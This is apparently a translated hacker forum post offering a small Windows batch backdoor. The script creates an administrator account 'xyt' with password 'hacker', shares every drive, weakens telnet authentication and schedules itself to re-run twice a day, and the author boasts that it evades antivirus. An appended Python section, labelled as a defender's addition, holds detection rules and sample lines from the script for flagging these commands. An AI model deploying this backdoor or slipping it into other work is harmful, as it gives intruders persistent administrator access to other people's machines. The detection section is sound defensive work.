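The idea for this code comes from my friend DESERT of 影子鹰. The original code was rather cumbersome, so I improved it. The advantages of this backdoor are that it is small and is not detected by antivirus software; just place it in the SYSTEM32 directory. The code is as follows: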
@echo off
@attrib +s + r xyt.bat
@net user xyt hacker /add
@net localgroup administrators xyt /add
@net share c$=c:
@net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h:
@tlntadmn config sec = -ntlm
@net stop schedule
@net start Schedule
@echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\xyt.bat
@echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\xyt.bat
@at 11:05 c:\WINNT\SYSTEM32\xyt.bat
@at 23:05 c:\WINNT\SYSTEM32\xyt.bat
@net stop telnet
@net start telnet
@exit
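This way our program runs in a loop: even if someone stops it, it will run again a few hours later, heh~~
After it has run, telnet to the IP; the username is xyt and the password is hacker.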
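
A defender's view of the script above, as an added example that is not part of the original post: a Python sketch that flags the command lines this backdoor relies on (account creation, administrators membership, drive shares, the telnet NTLM setting, and `at` jobs) in a batch file or a process command-line log. The rule labels, function names and the two benign sample lines are constructed for illustration; the other sample lines are copied from the script.

```python
import re

# (label, regex) pairs for the behaviours the script above combines;
# each regex is matched case-insensitively against one command line.
RULES = [
    ("account created", r"\bnet1?\s+user\s+\S+\s+\S+\s+/add\b"),
    ("added to administrators",
     r"\bnet1?\s+localgroup\s+administrators\s+\S+\s+/add\b"),
    ("drive shared", r"\bnet1?\s+share\s+\w\$\s*=\s*\w:"),
    ("telnet NTLM setting changed",
     r"\btlntadmn\s+config\s+sec\s*=\s*[-+]ntlm\b"),
    ("telnet service started", r"\bnet1?\s+start\s+telnet\b"),
    ("at job runs a system32 batch file",
     r"\bat\s+\d{1,2}:\d{2}\s+\S*\\system32\\\S+\.bat\b"),
]

# The combination that marks a self-restoring administrator backdoor.
CORE = {"account created", "added to administrators",
        "at job runs a system32 batch file"}

def scan(lines):
    """Return (line_number, label) for every rule that matches a line."""
    return [(n, label)
            for n, line in enumerate(lines, 1)
            for label, pattern in RULES
            if re.search(pattern, line, re.IGNORECASE)]

def is_persistent_admin_backdoor(lines):
    """True only when all CORE behaviours appear in the same input."""
    return CORE <= {label for _, label in scan(lines)}

# Lines 1-5 are copied from the script above; 6-7 are constructed benign lines.
SAMPLE = [
    r"@net user xyt hacker /add",
    r"@net localgroup administrators xyt /add",
    r"@net share c$=c:",
    r"@tlntadmn config sec = -ntlm",
    r"@at 11:05 c:\WINNT\SYSTEM32\xyt.bat",
    r"net use z: \\fileserver\public",
    r"net user",
]

if __name__ == "__main__":
    for n, label in scan(SAMPLE):
        print(f"line {n}: {label}")
    print("backdoor pattern:", is_persistent_admin_backdoor(SAMPLE))
```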

